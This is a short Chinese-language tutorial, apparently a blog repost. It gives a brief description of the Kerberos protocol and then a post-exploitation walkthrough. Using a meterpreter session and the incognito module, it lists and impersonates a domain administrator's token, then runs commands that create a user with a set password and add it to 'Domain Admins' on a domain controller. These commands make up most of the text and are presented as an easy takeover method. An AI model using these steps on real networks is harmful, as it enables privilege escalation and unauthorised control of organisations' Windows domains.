erberos是一種計算機網絡認證協議,它允許某實體在非安全網絡環境下通信,向另一個實體以一種安全的方式證明自己的身份。它也指由麻省理工實現此協議,併發布的一套免費軟件。它的設計主要針對客戶-服務器模型,並提供了一系列交互認證——用戶和服務器都能驗證對方的身份。
當成功的***了一個系統並建立了一個meterpreter的終端,域管理員登陸這臺機器的時候會發送Kerberos令牌到服務器上。我們可以使用這個活動令牌來***系統,通過meterpreter可以假冒成域管理員的角色,而不需要破解它的密碼然後可以去***域管理員賬號甚至域控制器。
在meterpreter的終端下加載incognito模塊list_tokens -u列舉出令牌,看到1230TT\\Administrator域管理員賬號我們可以假冒它
假冒Administrator域管理員賬號
impersonate_token 1230TT\\Administrator
添加用戶add_user 11 p@55w0rd! -h 192.168.1.150
把用戶添加到域管理員組add_group_user “Domain Admins” 11 -h 192.168.1.150
這樣很簡單就可以添加了一個域管理員用戶了
原文鏈接:http://1230tt.com/archives/250.html